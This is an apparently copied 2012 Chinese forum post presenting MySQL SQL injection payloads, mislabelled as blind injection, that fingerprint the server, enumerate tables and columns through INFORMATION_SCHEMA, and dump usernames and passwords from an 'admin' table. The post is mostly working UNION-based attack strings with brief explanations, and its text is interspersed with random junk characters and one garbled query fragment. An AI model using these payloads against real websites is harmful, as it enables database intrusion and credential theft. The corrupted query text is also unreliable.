本文介绍MYSQL盲注的一些语句和方法
2 i2 h$ ~5 F2 M6 _" D
' ]; Y- e: A# m学习盲注前先了解下 IFORMATION_SCHEMA 库
7 O6 L1 }2 @, _7 h! a1 W6 Q, S. p* l' |4 W1 i7 d. n! V. ?
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有2 p# ^5 L: `: _8 l/ P
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。. D, p0 C" ^4 Y5 |. z2 N
1.得到所有数据库名:
5 [" }, z4 p# {. u|SCHEMATA ->存储数据库名的表6 K1 X0 r- f+ s0 H. V v
|---字段:SCHEMA_NAME ->数据库名称
2 w+ [3 [7 @" _% Y! ] i& ^
1 Z1 z3 @7 `4 g) K1 }8 i8 y|TABLES ->存储表名
3 b2 P& \2 D( T1 `|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名4 w. d1 e8 L8 H( o4 a5 M4 B
|---字段:TABLE_NAME ->存储表的表名
0 k3 x/ |' t# H1 @+ |2 d" U
3 l# G! i; d1 Q2 C5 L2 P/ D|COLUMNS ->存储的字段名表
% C; p7 X( r- z3 h9 P|---字段:TABLE_SCHEMA ->该字段所属数据库名
0 W+ n4 n; E/ U0 Q& D1 l% v|---字段:TABLE_NAME ->存储所属表的名称& ]& Z$ v4 G# {0 T+ x5 t
. m3 b# F" C3 s( S5 k, P
|---字段:COLUMN_NAME ->该字段的名称, o% n; J0 B- k+ \ ^
i" }* s+ t. C: I( c2 B/ p 5 b9 m1 y8 n) T2 t2 w# x! U
4 T9 S, p3 i+ h8 s- R6 H1 D
###########################################################################' I- _. S5 _+ l) |/ y
- V+ A" b7 s' h( e/ b
0x001 获取系统信息:0 P+ O' _7 ~ @6 e. t
5 _8 m& T0 a& a1 E% _) X" m0 ~
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*' Y# |5 P, d5 ]* c8 E! L3 ?0 f. Q5 F% C
* P8 Q6 Z1 C' X+ P: c
/*( X! u* h! B- z0 i2 f
0 ]$ F7 V1 \1 }3 n
@@global.version_compile_os 获取系统版本0 r* k$ H6 |* y4 ~4 x$ [) F" b
# F& g4 X) D! h) o+ @% V! I* Q@@datadir 数据库路径+ Z& C; P) N6 Z9 s/ d0 h
database() 当前数据库名称
$ v( R3 M6 ~; `5 N0x3c62723e 换行HEX值
( {- r' a3 @" `' [; P H3 G& [3 X7 R2 W3 a& {
*/
$ t5 H, S- y- o! I' v9 D; X' {& k* \0 V# _ Y5 S
) `$ C5 [$ j& R+ M/ i5 H: j0 K3 r
, ?) [2 a* z! {& _5 u, v' w######################################################################; c4 L- m, A% Z( Z5 @' r. g
/ ~. V; m( m6 z4 U c0x002 获取表名
9 ?' r5 Y# i( o% b! { a, y) R, N6 i, v) \8 @ w; g2 A
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
2 I9 N2 T3 ~ J, L" k. F
; D# v& T7 m3 r. u- ~2 l 1 R# Y V% s/ Q$ W; I4 d
/ H" U2 [# q* f. V8 b6 c* X
/*% W$ {7 A+ U' R( @$ t
$ }9 x( n% x- G) d8 M- F3 V5 B) g
0x67617264656e 为当前数据库名
) A* ^- w0 A4 O- Y$ {
8 r5 q0 N* h' S4 g9 X& Agroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
# o7 M! Y$ F: ^& @' W* f! @& r7 I- X4 V# N; _& k6 S
*/
% Q* Z3 `. r+ N( p' O$ z& v
$ @1 n: J; _8 x######################################################################% R+ v5 p2 C. x4 ]" A, ]
" V; M, L- m( z% c
- n# f- X1 v) p2 n1 o4 A
9 Y' B$ A; { s+ t Y8 f0x003 获取字段6 V) A* K* x8 C
# I# _, l% u- N% c6 A
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
8 p, J0 ^: p5 y7 G7 [- R& l; C; U
) Y! {8 M6 X* E/*+ g1 u2 t* N, Y; s
. Z) b3 f6 u4 \2 N4 F3 b! o+ ?group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段3 s+ N: d# k* M# |; b3 K/ N
2 U( r/ B0 H6 B& R3 r1 P* V% c% b0x61646d696e ->选择一个表5 @; s/ `) t/ N: O6 t
( F; `3 q0 o3 U1 u0x67617264656e ->数据库名
* f+ h7 J, T% R
. {6 B/ ]' c0 q( N*/4 Y" N1 ]+ E9 j: Z+ d: P, H8 _
3 h% Q" D$ d2 v1 v7 j5 M) @
#####################################################################
. \) {4 u" x1 d4 l0 e6 j( `) \# F- l4 p q5 y
/ b0 H4 n% I% H/ k+ z
) b; v/ b, B" J$ R ~' U# I
0x004 获取数据9 R$ v4 H- z# M6 P6 f; [, q
' n& M2 N4 J# e- m/ |' Bunion select 1,2,3
+ A! l. Z$ u [1 |+ Y( ?2 n,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin% f* s( {& E( d5 p6 t
, c8 H c7 y* W% D
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
- C& M+ J/ n; Z ~3 Z$ E
" }% L6 t p: i5 \# X5 \; U9 P
2 W& ^( @$ }; g3 s! _% a- ?8 X1 _1 V6 e! M; ?1 ?$ L
/*3 B/ p; F. s' h( q9 ]4 V
- K6 ?" I( x5 W7 ] L. e/ [0x3c62723e 换行符号HEX编码+ z) y- R0 h* B$ H; I
3 o; {4 }( h* r- Y- \$ w/ S# W" cgroup_concat 同时获得该字段所有数据' X, {$ h+ x$ N0 w E# c4 @# R) @
8 u) g1 R- n! [; ~( x- [3 N" U
*/
* F$ ?" o R! A( L7 [
4 z( b5 I1 L: C! [- i |
发表于 2012-9-13 17:48:44
收藏
支持
反对